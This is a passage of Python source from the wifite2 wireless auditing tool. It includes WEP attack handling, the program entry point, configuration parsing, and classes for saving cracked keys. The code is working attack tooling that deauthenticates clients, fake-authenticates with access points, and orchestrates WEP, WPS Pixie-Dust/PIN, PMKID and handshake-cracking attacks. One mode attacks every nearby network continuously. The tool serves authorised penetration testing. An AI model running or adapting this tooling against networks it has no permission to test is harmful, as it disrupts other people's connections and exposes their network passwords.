Color.pexception(e) continue # End of big try-catch # End of for-each-attack-type loop if keep_ivs: Airodump.delete_airodump_temp_files('wep') self.success = False return self.success @staticmethod def user_wants_to_stop(current_attack, attacks_remaining, target): """ Ask user what attack to perform next (re-orders attacks_remaining, returns False), or if we should stop attacking this target (returns True). """ if target is None: Color.pl('') return True target_name = target.essid if target.essid_known else target.bssid Color.pl('\n\n{!} {O}Interrupted') Color.pl('{+} {W}Next steps:') # Deauth clients & retry attack_index = 1 Color.pl(' {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}' % ( current_attack, target_name)) # Move onto a different WEP attack for attack_name in attacks_remaining: attack_index += 1 Color.pl( ' {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}' % (attack_index, attack_name, target_name)) # Stop attacking entirely attack_index += 1 Color.pl(' {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}' % attack_index) while True: Color.p('{?} Select an option ({G}1-%d{W}): ' % attack_index) answer = input() if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index: Color.pl('{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}' % attack_index) continue answer = int(answer) break if answer == 1: # Deauth clients & retry deauth_count = 1 Color.clear_entire_line() Color.p('\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...') Aireplay.deauth(target.bssid, essid=target.essid) attacking_mac = Ip.get_mac(Configuration.interface) for client in target.clients: if attacking_mac.lower() == client.station.lower(): continue # Don't deauth ourselves. Color.clear_entire_line() Color.p('\r{+} {O}Deauthenticating client {C}%s{W}...' % client.station) Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid) deauth_count += 1 Color.clear_entire_line() Color.pl('\r{+} Sent {C}%d {O}deauths{W}' % deauth_count) # Re-insert current attack to top of list of attacks remaining attacks_remaining.insert(0, current_attack) return False # Don't stop elif answer == attack_index: return True # Stop attacking elif answer > 1: # User selected specific attack: Re-order attacks based on desired next-step attacks_remaining.insert(0, attacks_remaining.pop(answer - 2)) return False # Don't stop def fake_auth(self): """ Attempts to fake-authenticate with target. Returns: True if successful, False is unsuccessful. """ Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' % self.target.bssid) fakeauth = Aireplay.fakeauth(self.target, timeout=AttackWEP.fakeauth_wait) if fakeauth: Color.pl(' {G}success{W}') else: Color.pl(' {R}failed{W}') if Configuration.require_fakeauth: # Fakeauth is required, fail raise Exception('Fake-authenticate did not complete within %d seconds' % AttackWEP.fakeauth_wait) # Warn that fakeauth failed Color.pl('{!} {O} unable to fake-authenticate with target (%s){W}' % self.target.bssid) Color.pl('{!} continuing attacks because {G}--require-fakeauth{W} was not set') return fakeauth if __name__ == '__main__': Configuration.initialize(True) from ..model.target import Target fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54e,WEP, WEP, , -58, 2' \ ', 0, 0. 0. 0. 0, 9, Test Router Please Ignore, '.split(',') target = Target(fields) wep = AttackWEP(target) wep.run() Configuration.exit_gracefully(0) wifite2-2.7.0/wifite/__init__.py0000755000175000017500000000000014437644461016037 0ustar sophiesophiewifite2-2.7.0/wifite/__main__.py0000755000175000017500000000707714437644461016045 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- try: from .config import Configuration except (ValueError, ImportError) as e: raise Exception("You may need to run wifite from the root directory (which includes README.md)", e) from e from .util.color import Color import os import subprocess class Wifite(object): def __init__(self): """ Initializes Wifite. Checks that its running under *nix, with root permissions and ensures dependencies are installed. """ self.print_banner() Configuration.initialize(load_interface=False) if os.name == 'nt': Color.pl('{!} {R}error: {O}wifite{R} must be run under a {O}*NIX{W}{R} like OS') Configuration.exit_gracefully(0) if os.getuid() != 0: Color.pl('{!} {R}error: {O}wifite{R} must be run as {O}root{W}') Color.pl('{!} {R}re-run with {O}sudo{W}') Configuration.exit_gracefully(0) from .tools.dependency import Dependency Dependency.run_dependency_check() def start(self): """ Starts target-scan + attack loop, or launches utilities depending on user input. """ from .model.result import CrackResult from .model.handshake import Handshake from .util.crack import CrackHelper if Configuration.show_cracked: CrackResult.display() elif Configuration.check_handshake: Handshake.check() elif Configuration.crack_handshake: CrackHelper.run() else: Configuration.get_monitor_mode_interface() self.scan_and_attack() @staticmethod def print_banner(): """Displays ASCII art of the highest caliber.""" Color.pl(r' {G} . {GR}{D} {W}{G} . {W}') Color.pl(r' {G}.´ · .{GR}{D} {W}{G}. · `. {G}wifite2 {D}%s{W}' % Configuration.version) Color.pl(r' {G}: : : {GR}{D} (¯) {W}{G} : : : {W}{D}a wireless auditor by derv82{W}') Color.pl(r' {G}`. · `{GR}{D} /¯\ {W}{G}´ · .´ {W}{D}maintained by kimocoder{W}') Color.pl(r' {G} ` {GR}{D}/¯¯¯\{W}{G} ´ {C}{D}https://github.com/kimocoder/wifite2{W}') Color.pl('') @staticmethod def scan_and_attack(): """ 1) Scans for targets, asks user to select targets 2) Attacks each target """ from .util.scanner import Scanner from .attack.all import AttackAll Color.pl('') # Scan s = Scanner() do_continue = s.find_targets() targets = s.select_targets() if Configuration.infinite_mode: while do_continue: AttackAll.attack_multiple(targets) do_continue = s.update_targets() if not do_continue: break targets = s.select_targets() attacked_targets = s.get_num_attacked() else: # Attack attacked_targets = AttackAll.attack_multiple(targets) Color.pl('{+} Finished attacking {C}%d{W} target(s), exiting' % attacked_targets) def entry_point(): try: wifite = Wifite() wifite.start() except Exception as e: Color.pexception(e) Color.pl('\n{!} {R}Exiting{W}\n') except KeyboardInterrupt: Color.pl('\n{!} {O}Interrupted, Shutting down...{W}') # Delete Reaver .pcap subprocess.run(["rm", "reaver_output.pcap"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) Configuration.exit_gracefully(0) if __name__ == '__main__': entry_point() wifite2-2.7.0/wifite/config.py0000755000175000017500000006447014437644461015572 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import os import re from .util.color import Color from .tools.macchanger import Macchanger class Configuration(object): """ Stores configuration variables and functions for Wifite. """ initialized = False # Flag indicating config has been initialized verbose = 0 version = '2.7.0' all_bands = None attack_max = None check_handshake = None clients_only = None cracked_file = None crack_handshake = None daemon = None dont_use_pmkid = None encryption_filter = None existing_commands = None five_ghz = None ignore_cracked = None ignore_essids = None ignore_old_handshakes = None infinite_mode = None inf_wait_time = None interface = None kill_conflicting_processes = None manufacturers = None min_power = None no_deauth = None no_wps = None no_nullpin = None num_deauths = None pmkid_timeout = None print_stack_traces = None random_mac = None require_fakeauth = None scan_time = None show_bssids = None show_cracked = None show_manufacturers = None skip_crack = None target_bssid = None target_channel = None target_essid = None temp_dir = None # Temporary directory two_ghz = None use_bully = None use_eviltwin = None use_pmkid_only = None wep_attacks = None wep_crack_at_ivs = None wep_filter = None wep_keep_ivs = None wep_pps = None wep_restart_aircrack = None wep_restart_stale_ivs = None wordlist = None wpa_attack_timeout = None wpa_deauth_timeout = None wpa_filter = None wpa_handshake_dir = None wpa_strip_handshake = None wps_fail_threshold = None wps_filter = None wps_ignore_lock = None wps_only = None wps_pin = None wps_pixie = None wps_pixie_timeout = None wps_timeout_threshold = None @classmethod def initialize(cls, load_interface=True): """ Sets up default initial configuration values. Also sets config values based on command-line arguments. """ # TODO: categorize configuration into # separate classes (under config/*.py) # E.g. Configuration.wps.enabled, # Configuration.wps.timeout, etc # Only initialize this class once if cls.initialized: return cls.initialized = True cls.verbose = 0 # Verbosity of output. Higher number means more debug info about running processes. cls.print_stack_traces = True cls.kill_conflicting_processes = False cls.scan_time = 0 # Time to wait before attacking all targets cls.tx_power = 0 # Wifi transmit power (0 is default) cls.interface = None cls.min_power = 0 # Minimum power for an access point to be considered a target. Default is 0 cls.attack_max = 0 cls.skip_crack = False cls.target_channel = None # User-defined channel to scan cls.target_essid = None # User-defined AP name cls.target_bssid = None # User-defined AP BSSID cls.ignore_essids = None # ESSIDs to ignore cls.ignore_cracked = False # Ignore previously-cracked BSSIDs cls.clients_only = False # Only show targets that have associated clients cls.all_bands = False # Scan for both 2Ghz and 5Ghz channels cls.two_ghz = False # Scan 2.4Ghz channels cls.five_ghz = False # Scan 5Ghz channels cls.infinite_mode = False # Attack targets continuously cls.inf_wait_time = 60 cls.show_bssids = False # Show BSSIDs in targets list cls.show_manufacturers = False # Show manufacturers in targets list cls.random_mac = False # Should generate a random Mac address at startup. cls.no_deauth = False # Deauth hidden networks & WPA handshake targets cls.num_deauths = 1 # Number of deauth packets to send to each target. cls.daemon = False # Don't put back interface back in managed mode cls.encryption_filter = ['WEP', 'WPA', 'WPS'] # EvilTwin variables cls.use_eviltwin = False cls.eviltwin_port = 80 cls.eviltwin_deauth_iface = None cls.eviltwin_fakeap_iface = None # WEP variables cls.wep_filter = False # Only attack WEP networks cls.wep_pps = 600 # Packets per second cls.wep_timeout = 600 # Seconds to wait before failing cls.wep_crack_at_ivs = 10000 # Minimum IVs to start cracking cls.require_fakeauth = False cls.wep_restart_stale_ivs = 11 # Seconds to wait before restarting # Aireplay if IVs don't increaes. # '0' means never restart. cls.wep_restart_aircrack = 30 # Seconds to give aircrack to crack # before restarting the process. cls.wep_crack_at_ivs = 10000 # Number of IVS to start cracking cls.wep_keep_ivs = False # Retain .ivs files across multiple attacks. # WPA variables cls.wpa_filter = False # Only attack WPA networks cls.wpa_deauth_timeout = 15 # Wait time between deauths cls.wpa_attack_timeout = 300 # Wait time before failing cls.wpa_handshake_dir = 'hs' # Dir to store handshakes cls.wpa_strip_handshake = False # Strip non-handshake packets cls.ignore_old_handshakes = False # Always fetch a new handshake # PMKID variables cls.use_pmkid_only = False # Only use PMKID Capture+Crack attack cls.pmkid_timeout = 300 # Time to wait for PMKID capture cls.dont_use_pmkid = False # Don't use PMKID attack # Default dictionary for cracking cls.cracked_file = 'cracked.json' cls.wordlist = None wordlists = [ './wordlist-probable.txt', # Local file (ran from cloned repo) '/usr/share/dict/wordlist-probable.txt', # setup.py with prefix=/usr '/usr/local/share/dict/wordlist-probable.txt', # setup.py with prefix=/usr/local # Other passwords found on Kali '/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt', '/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt', '/usr/share/wordlists/fern-wifi/common.txt' ] for wlist in wordlists: if os.path.exists(wlist): cls.wordlist = wlist break if os.path.isfile('/usr/share/ieee-data/oui.txt'): manufacturers = '/usr/share/ieee-data/oui.txt' else: manufacturers = 'ieee-oui.txt' if os.path.exists(manufacturers): cls.manufacturers = {} with open(manufacturers, "r", encoding='utf-8') as f: # Parse txt format into dict for line in f: if not re.match(r"^\w", line): continue line = line.replace('(hex)', '').replace('(base 16)', '') fields = line.split() if len(fields) >= 2: cls.manufacturers[fields[0]] = " ".join(fields[1:]).rstrip('.') # WPS variables cls.wps_filter = False # Only attack WPS networks cls.no_wps = False # Do not use WPS attacks (Pixie-Dust & PIN attacks) cls.wps_only = False # ONLY use WPS attacks on non-WEP networks cls.use_bully = False # Use bully instead of reaver cls.use_reaver = False # Use reaver instead of bully cls.wps_pixie = True cls.wps_no_nullpin = True cls.wps_pin = True cls.wps_ignore_lock = False # Skip WPS PIN attack if AP is locked. cls.wps_pixie_timeout = 300 # Seconds to wait for PIN before WPS Pixie attack fails cls.wps_fail_threshold = 100 # Max number of failures cls.wps_timeout_threshold = 100 # Max number of timeouts # Commands cls.show_cracked = False cls.check_handshake = None cls.crack_handshake = False # A list to cache all checked commands (e.g. `which hashcat` will execute only once) cls.existing_commands = {} # Overwrite config values with arguments (if defined) cls.load_from_arguments() if load_interface: cls.get_monitor_mode_interface() @classmethod def get_monitor_mode_interface(cls): if cls.interface is None: # Interface wasn't defined, select it! from .tools.airmon import Airmon cls.interface = Airmon.ask() if cls.random_mac: Macchanger.random() @classmethod def load_from_arguments(cls): """ Sets configuration values based on Argument.args object """ from .args import Arguments args = Arguments(cls).args cls.parse_settings_args(args) cls.parse_wep_args(args) cls.parse_wpa_args(args) cls.parse_wps_args(args) cls.parse_pmkid_args(args) cls.parse_encryption() # EvilTwin ''' if args.use_eviltwin: cls.use_eviltwin = True Color.pl('{+} {C}option:{W} using {G}eviltwin attacks{W} against all targets') ''' cls.parse_wep_attacks() cls.validate() # Commands if args.cracked: cls.show_cracked = True if args.check_handshake: cls.check_handshake = args.check_handshake if args.crack_handshake: cls.crack_handshake = True @classmethod def validate(cls): if cls.use_pmkid_only and cls.wps_only: Color.pl('{!} {R}Bad Configuration:{O} --pmkid and --wps-only are not compatible') raise RuntimeError('Unable to attack networks: --pmkid and --wps-only are not compatible together') if cls.use_pmkid_only and cls.dont_use_pmkid: Color.pl('{!} {R}Bad Configuration:{O} --pmkid and --no-pmkid are not compatible') raise RuntimeError('Unable to attack networks: --pmkid and --no-pmkid are not compatible together') @classmethod def parse_settings_args(cls, args): """Parses basic settings/configurations from arguments.""" if args.random_mac: cls.random_mac = True Color.pl('{+} {C}option:{W} using {G}random mac address{W} when scanning & attacking') if args.channel: chn_arg_re = re.compile("^\d+((,\d+)|(-\d+,\d+))*(-\d+)?$") if not chn_arg_re.match(args.channel): raise ValueError("Invalid channel! The format must be 1,3-6,9") cls.target_channel = args.channel Color.pl('{+} {C}option:{W} scanning for targets on channel {G}%s{W}' % args.channel) if args.interface: cls.interface = args.interface Color.pl('{+} {C}option:{W} using wireless interface {G}%s{W}' % args.interface) if args.target_bssid: cls.target_bssid = args.target_bssid Color.pl('{+} {C}option:{W} targeting BSSID {G}%s{W}' % args.target_bssid) if args.all_bands: cls.all_bands = True Color.pl('{+} {C}option:{W} including both {G}2.4Ghz and 5Ghz networks{W} in scans') if args.two_ghz: cls.two_ghz = True Color.pl('{+} {C}option:{W} including {G}2.4Ghz networks{W} in scans') if args.five_ghz: cls.five_ghz = True Color.pl('{+} {C}option:{W} including {G}5Ghz networks{W} in scans') if args.infinite_mode: cls.infinite_mode = True Color.p('{+} {C}option:{W} ({G}infinite{W}) attack all neighbors forever') if not args.scan_time: Color.p(f'; {{O}}pillage time not selected{{W}}, using default {{G}}{cls.inf_wait_time:d}{{W}}s') args.scan_time = cls.inf_wait_time Color.pl('') if args.show_bssids: cls.show_bssids = True Color.pl('{+} {C}option:{W} showing {G}bssids{W} of targets during scan') if args.show_manufacturers is True: cls.show_manufacturers = True Color.pl('{+} {C}option:{W} showing {G}manufacturers{W} of targets during scan') if args.no_deauth: cls.no_deauth = True Color.pl('{+} {C}option:{W} will {R}not{W} {O}deauth{W} clients during scans or captures') if args.daemon is True: cls.daemon = True Color.pl('{+} {C}option:{W} will put interface back to managed mode') if args.num_deauths and args.num_deauths > 0: cls.num_deauths = args.num_deauths Color.pl(f'{{+}} {{C}}option:{{W}} send {{G}}{cls.num_deauths:d}{{W}} deauth packets when deauthing') if args.min_power and args.min_power > 0: cls.min_power = args.min_power Color.pl(f'{{+}} {{C}}option:{{W}} Minimum power {{G}}{cls.min_power:d}{{W}} for target to be shown') if args.skip_crack: cls.skip_crack = True Color.pl('{+} {C}option:{W} Skip cracking captured handshakes/pmkid {G}enabled{W}') if args.attack_max and args.attack_max > 0: cls.attack_max = args.attack_max Color.pl(f'{{+}} {{C}}option:{{W}} Attack first {{G}}{cls.attack_max:d}{{W}} targets from list') if args.target_essid: cls.target_essid = args.target_essid Color.pl('{+} {C}option:{W} targeting ESSID {G}%s{W}' % args.target_essid) if args.ignore_essids is not None: cls.ignore_essids = args.ignore_essids Color.pl('{+} {C}option: {O}ignoring ESSID(s): {R}%s{W}' % ', '.join(args.ignore_essids)) if args.ignore_cracked: from .model.result import CrackResult if cracked_targets := CrackResult.load_all(): cls.ignore_cracked = [item['bssid'] for item in cracked_targets] Color.pl('{+} {C}option: {O}ignoring {R}%s{O} previously-cracked targets' % len(cls.ignore_cracked)) else: Color.pl('{!} {R}Previously-cracked access points not found in %s' % cls.cracked_file) cls.ignore_cracked = False if args.clients_only: cls.clients_only = True Color.pl('{+} {C}option:{W} {O}ignoring targets that do not have associated clients') if args.scan_time: cls.scan_time = args.scan_time Color.pl( f'{{+}} {{C}}option:{{W}} ({{G}}pillage{{W}}) attack all targets after {{G}}{args.scan_time:d}{{W}}s') if args.verbose: cls.verbose = args.verbose Color.pl('{+} {C}option:{W} verbosity level {G}%d{W}' % args.verbose) if args.kill_conflicting_processes: cls.kill_conflicting_processes = True Color.pl('{+} {C}option:{W} kill conflicting processes {G}enabled{W}') @classmethod def parse_wep_args(cls, args): """Parses WEP-specific arguments""" if args.wep_filter: cls.wep_filter = args.wep_filter if args.wep_pps: cls.wep_pps = args.wep_pps Color.pl('{+} {C}option:{W} using {G}%d{W} packets/sec on WEP attacks' % args.wep_pps) if args.wep_timeout: cls.wep_timeout = args.wep_timeout Color.pl('{+} {C}option:{W} WEP attack timeout set to {G}%d seconds{W}' % args.wep_timeout) if args.require_fakeauth: cls.require_fakeauth = True Color.pl('{+} {C}option:{W} fake-authentication is {G}required{W} for WEP attacks') if args.wep_crack_at_ivs: cls.wep_crack_at_ivs = args.wep_crack_at_ivs Color.pl('{+} {C}option:{W} will start cracking WEP keys at {G}%d IVs{W}' % args.wep_crack_at_ivs) if args.wep_restart_stale_ivs: cls.wep_restart_stale_ivs = args.wep_restart_stale_ivs Color.pl('{+} {C}option:{W} will restart aireplay after {G}%d seconds{W} of no new IVs' % args.wep_restart_stale_ivs) if args.wep_restart_aircrack: cls.wep_restart_aircrack = args.wep_restart_aircrack Color.pl('{+} {C}option:{W} will restart aircrack every {G}%d seconds{W}' % args.wep_restart_aircrack) if args.wep_keep_ivs: cls.wep_keep_ivs = args.wep_keep_ivs Color.pl('{+} {C}option:{W} keep .ivs files across multiple WEP attacks') @classmethod def parse_wpa_args(cls, args): """Parses WPA-specific arguments""" if args.wpa_filter: cls.wpa_filter = args.wpa_filter if args.wordlist: if not os.path.exists(args.wordlist): cls.wordlist = None Color.pl('{+} {C}option:{O} wordlist {R}%s{O} was not found, wifite will NOT attempt to crack ' 'handshakes' % args.wordlist) elif os.path.isfile(args.wordlist): cls.wordlist = args.wordlist Color.pl('{+} {C}option:{W} using wordlist {G}%s{W} for cracking' % args.wordlist) elif os.path.isdir(args.wordlist): cls.wordlist = None Color.pl('{+} {C}option:{O} wordlist {R}%s{O} is a directory, not a file. Wifite will NOT attempt to ' 'crack handshakes' % args.wordlist) if args.wpa_deauth_timeout: cls.wpa_deauth_timeout = args.wpa_deauth_timeout Color.pl('{+} {C}option:{W} will deauth WPA clients every {G}%d seconds{W}' % args.wpa_deauth_timeout) if args.wpa_attack_timeout: cls.wpa_attack_timeout = args.wpa_attack_timeout Color.pl( '{+} {C}option:{W} will stop WPA handshake capture after {G}%d seconds{W}' % args.wpa_attack_timeout) if args.ignore_old_handshakes: cls.ignore_old_handshakes = True Color.pl('{+} {C}option:{W} will {O}ignore{W} existing handshakes (force capture)') if args.wpa_handshake_dir: cls.wpa_handshake_dir = args.wpa_handshake_dir Color.pl('{+} {C}option:{W} will store handshakes to {G}%s{W}' % args.wpa_handshake_dir) if args.wpa_strip_handshake: cls.wpa_strip_handshake = True Color.pl('{+} {C}option:{W} will {G}strip{W} non-handshake packets') @classmethod def parse_wps_args(cls, args): """Parses WPS-specific arguments""" if args.wps_filter: cls.wps_filter = args.wps_filter if args.wps_only: cls.wps_only = True cls.wps_filter = True # Also only show WPS networks Color.pl('{+} {C}option:{W} will *only* attack WPS networks with ' '{G}WPS attacks{W} (avoids handshake and PMKID)') if args.no_wps: # No WPS attacks at all cls.no_wps = args.no_wps cls.wps_pixie = False cls.wps_no_nullpin = True cls.wps_pin = False Color.pl('{+} {C}option:{W} will {O}never{W} use {C}WPS attacks{W} (Pixie-Dust/PIN) on targets') elif args.wps_pixie: # WPS Pixie-Dust only cls.wps_pixie = True cls.wps_no_nullpin = True cls.wps_pin = False Color.pl('{+} {C}option:{W} will {G}only{W} use {C}WPS Pixie-Dust attack{W} (no {O}PIN{W}) on targets') elif args.wps_no_nullpin: # WPS NULL PIN only cls.wps_pixie = True cls.wps_no_nullpin = False cls.wps_pin = True Color.pl('{+} {C}option:{W} will {G}not{W} use {C}WPS NULL PIN attack{W} (no {O}PIN{W}) on targets') elif args.wps_no_pixie: # WPS PIN only cls.wps_pixie = False cls.wps_no_nullpin = True cls.wps_pin = True Color.pl('{+} {C}option:{W} will {G}only{W} use {C}WPS PIN attack{W} (no {O}Pixie-Dust{W}) on targets') if args.use_bully: from .tools.bully import Bully if not Bully.exists(): Color.pl('{!} {R}Bully not found. Defaulting to {O}reaver{W}') cls.use_bully = False else: cls.use_bully = args.use_bully Color.pl('{+} {C}option:{W} use {C}bully{W} instead of {C}reaver{W} for WPS Attacks') if args.use_reaver: from .tools.reaver import Reaver if not Reaver.exists(): Color.pl('{!} {R}Reaver not found. Defaulting to {O}bully{W}') cls.use_reaver = False else: cls.use_reaver = args.use_reaver Color.pl('{+} {C}option:{W} use {C}reaver{W} instead of {C}bully{W} for WPS Attacks') if args.wps_pixie_timeout: cls.wps_pixie_timeout = args.wps_pixie_timeout Color.pl( '{+} {C}option:{W} WPS pixie-dust attack will fail after {O}%d seconds{W}' % args.wps_pixie_timeout) if args.wps_fail_threshold: cls.wps_fail_threshold = args.wps_fail_threshold Color.pl('{+} {C}option:{W} will stop WPS attack after {O}%d failures{W}' % args.wps_fail_threshold) if args.wps_timeout_threshold: cls.wps_timeout_threshold = args.wps_timeout_threshold Color.pl('{+} {C}option:{W} will stop WPS attack after {O}%d timeouts{W}' % args.wps_timeout_threshold) if args.wps_ignore_lock: cls.wps_ignore_lock = True Color.pl('{+} {C}option:{W} will {O}ignore{W} WPS lock-outs') @classmethod def parse_pmkid_args(cls, args): if args.use_pmkid_only: cls.use_pmkid_only = True Color.pl('{+} {C}option:{W} will ONLY use {C}PMKID{W} attack on WPA networks') if args.pmkid_timeout: cls.pmkid_timeout = args.pmkid_timeout Color.pl('{+} {C}option:{W} will wait {G}%d seconds{W} during {C}PMKID{W} capture' % args.pmkid_timeout) if args.dont_use_pmkid: cls.dont_use_pmkid = True Color.pl('{+} {C}option:{W} will NOT use {C}PMKID{W} attack on WPA networks') @classmethod def parse_encryption(cls): """Adjusts encryption filter (WEP and/or WPA and/or WPS)""" cls.encryption_filter = [] if cls.wep_filter: cls.encryption_filter.append('WEP') if cls.wpa_filter: cls.encryption_filter.append('WPA') if cls.wps_filter: cls.encryption_filter.append('WPS') if len(cls.encryption_filter) == 3: Color.pl('{+} {C}option:{W} targeting {G}all encrypted networks{W}') elif not cls.encryption_filter: # Default to scan all types cls.encryption_filter = ['WEP', 'WPA', 'WPS'] else: Color.pl('{+} {C}option:{W} targeting {G}%s-encrypted{W} networks' % '/'.join(cls.encryption_filter)) @classmethod def parse_wep_attacks(cls): """Parses and sets WEP-specific args (-chopchop, -fragment, etc)""" cls.wep_attacks = [] from sys import argv seen = set() for arg in argv: if arg in seen: continue seen.add(arg) if arg == '-arpreplay': cls.wep_attacks.append('replay') elif arg == '-caffelatte': cls.wep_attacks.append('caffelatte') elif arg == '-chopchop': cls.wep_attacks.append('chopchop') elif arg == '-fragment': cls.wep_attacks.append('fragment') elif arg == '-hirte': cls.wep_attacks.append('hirte') elif arg == '-p0841': cls.wep_attacks.append('p0841') if not cls.wep_attacks: # Use all attacks cls.wep_attacks = ['replay', 'fragment', 'chopchop', 'caffelatte', 'p0841', 'hirte'] elif len(cls.wep_attacks) > 0: Color.pl('{+} {C}option:{W} using {G}%s{W} WEP attacks' % '{W}, {G}'.join(cls.wep_attacks)) @classmethod def temp(cls, subfile=''): """ Creates and/or returns the temporary directory """ if cls.temp_dir is None: cls.temp_dir = cls.create_temp() return cls.temp_dir + subfile @staticmethod def create_temp(): """ Creates and returns a temporary directory """ from tempfile import mkdtemp tmp = mkdtemp(prefix='wifite') if not tmp.endswith(os.sep): tmp += os.sep return tmp @classmethod def delete_temp(cls): """ Remove temp files and folder """ if cls.temp_dir is None: return if os.path.exists(cls.temp_dir): for f in os.listdir(cls.temp_dir): os.remove(cls.temp_dir + f) os.rmdir(cls.temp_dir) @classmethod def exit_gracefully(cls, code=0): """ Deletes temp and exist with the given code """ cls.delete_temp() Macchanger.reset_if_changed() from .tools.airmon import Airmon if cls.interface is not None and Airmon.base_interface is not None: if not cls.daemon: Color.pl('{!} {O}Note:{W} Leaving interface in Monitor Mode!') if Airmon.isdeprecated: Color.pl('{!} To disable Monitor Mode when finished: {C}iwconfig %s mode managed{W}' % cls.interface) else: Color.pl('{!} To disable Monitor Mode when finished: {C}airmon-ng stop %s{W}' % cls.interface) else: # Stop monitor mode Airmon.stop(cls.interface) # Bring original interface back up Airmon.put_interface_up(Airmon.base_interface) if Airmon.killed_network_manager: Color.pl('{!} You can restart NetworkManager when finished ({C}service NetworkManager start{W})') # Airmon.start_network_manager() exit(code) @classmethod def dump(cls): """ (Colorful) string representation of the configuration """ from .util.color import Color max_len = 20 for key in list(cls.__dict__.keys()): max_len = max(max_len, len(key)) result = Color.s('{W}%s Value{W}\n' % 'cls Key'.ljust(max_len)) result += Color.s('{W}%s------------------{W}\n' % ('-' * max_len)) for (key, val) in sorted(cls.__dict__.items()): if key.startswith('__') or type(val) in [classmethod, staticmethod] or val is None: continue result += Color.s('{G}%s {W} {C}%s{W}\n' % (key.ljust(max_len), val)) return result if __name__ == '__main__': Configuration.initialize(False) print((Configuration.dump())) wifite2-2.7.0/wifite/model/0000755000175000017500000000000014437644461015035 5ustar sophiesophiewifite2-2.7.0/wifite/model/pmkid_result.py0000755000175000017500000000345114437644461020117 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.color import Color from .result import CrackResult class CrackResultPMKID(CrackResult): def __init__(self, bssid, essid, pmkid_file, key): self.result_type = 'PMKID' self.bssid = bssid self.essid = essid self.pmkid_file = pmkid_file self.key = key super(CrackResultPMKID, self).__init__() def dump(self): if self.essid: Color.pl(f'{{+}} {"Access Point Name".rjust(19)}: {{C}}{self.essid}{{W}}') if self.bssid: Color.pl(f'{{+}} {"Access Point BSSID".rjust(19)}: {{C}}{self.bssid}{{W}}') Color.pl('{+} %s: {C}%s{W}' % ('Encryption'.rjust(19), self.result_type)) if self.pmkid_file: Color.pl('{+} %s: {C}%s{W}' % ('PMKID File'.rjust(19), self.pmkid_file)) if self.key: Color.pl('{+} %s: {G}%s{W}' % ('PSK (password)'.rjust(19), self.key)) else: Color.pl('{!} %s {O}key unknown{W}' % ''.rjust(19)) def print_single_line(self, longest_essid): self.print_single_line_prefix(longest_essid) Color.p('{G}%s{W}' % 'PMKID'.ljust(5)) Color.p(' ') Color.p('Key: {G}%s{W}' % self.key) Color.pl('') def to_dict(self): return { 'type': self.result_type, 'date': self.date, 'essid': self.essid, 'bssid': self.bssid, 'key': self.key, 'pmkid_file': self.pmkid_file } if __name__ == '__main__': w = CrackResultPMKID('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/pmkid_blah-123213.22000', 'abcd1234') w.dump() w = CrackResultPMKID('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/pmkid_blah-123213.22000', 'Key') print('\n') w.dump() w.save() print((w.__dict__['bssid'])) wifite2-2.7.0/wifite/model/result.py0000755000175000017500000001417314437644461016736 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*-* from ..util.color import Color from ..config import Configuration import os import time from json import loads, dumps class CrackResult(object): """ Abstract class containing results from a crack session """ # File to save cracks to, in PWD cracked_file = Configuration.cracked_file def __init__(self): self.date = int(time.time()) self.readable_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.date)) def dump(self): raise Exception('Unimplemented method: dump()') def to_dict(self): raise Exception('Unimplemented method: to_dict()') def print_single_line(self, longest_essid): raise Exception('Unimplemented method: print_single_line()') def print_single_line_prefix(self, longest_essid): essid = self.essid or 'N/A' Color.p('{W} ') Color.p('{C}%s{W}' % essid.ljust(longest_essid)) Color.p(' ') Color.p('{GR}%s{W}' % self.bssid.ljust(17)) Color.p(' ') Color.p('{D}%s{W}' % self.readable_date.ljust(19)) Color.p(' ') def save(self): """ Adds this crack result to the cracked file and saves it. """ name = CrackResult.cracked_file saved_results = [] if os.path.exists(name): with open(name, 'r') as fid: text = fid.read() try: saved_results = loads(text) except Exception as e: Color.pl('{!} error while loading %s: %s' % (name, str(e))) # Check for duplicates this_dict = self.to_dict() this_dict.pop('date') for entry in saved_results: this_dict['date'] = entry.get('date') if entry == this_dict: # Skip if we already saved this BSSID+ESSID+TYPE+KEY Color.pl('{+} {C}%s{O} already exists in {G}%s{O}, skipping.' % ( self.essid, Configuration.cracked_file)) return saved_results.append(self.to_dict()) with open(name, 'w') as fid: fid.write(dumps(saved_results, indent=2)) Color.pl('{+} saved crack result to {C}%s{W} ({G}%d total{W})' % (name, len(saved_results))) @classmethod def display(cls): """ Show cracked targets from cracked file """ name = cls.cracked_file if not os.path.exists(name): Color.pl('{!} {O}file {C}%s{O} not found{W}' % name) return with open(name, 'r') as fid: cracked_targets = loads(fid.read()) if len(cracked_targets) == 0: Color.pl('{!} {R}no results found in {O}%s{W}' % name) return Color.pl('\n{+} Displaying {G}%d{W} cracked target(s) from {C}%s{W}\n' % ( len(cracked_targets), name)) results = sorted([cls.load(item) for item in cracked_targets], key=lambda x: x.date, reverse=True) longest_essid = max(len(result.essid or 'ESSID') for result in results) # Header Color.p('{D} ') Color.p('ESSID'.ljust(longest_essid)) Color.p(' ') Color.p('BSSID'.ljust(17)) Color.p(' ') Color.p('DATE'.ljust(19)) Color.p(' ') Color.p('TYPE'.ljust(5)) Color.p(' ') Color.p('KEY') Color.pl('{D}') Color.p(' ' + '-' * (longest_essid + 17 + 19 + 5 + 11 + 12)) Color.pl('{W}') # Results for result in results: result.print_single_line(longest_essid) Color.pl('') 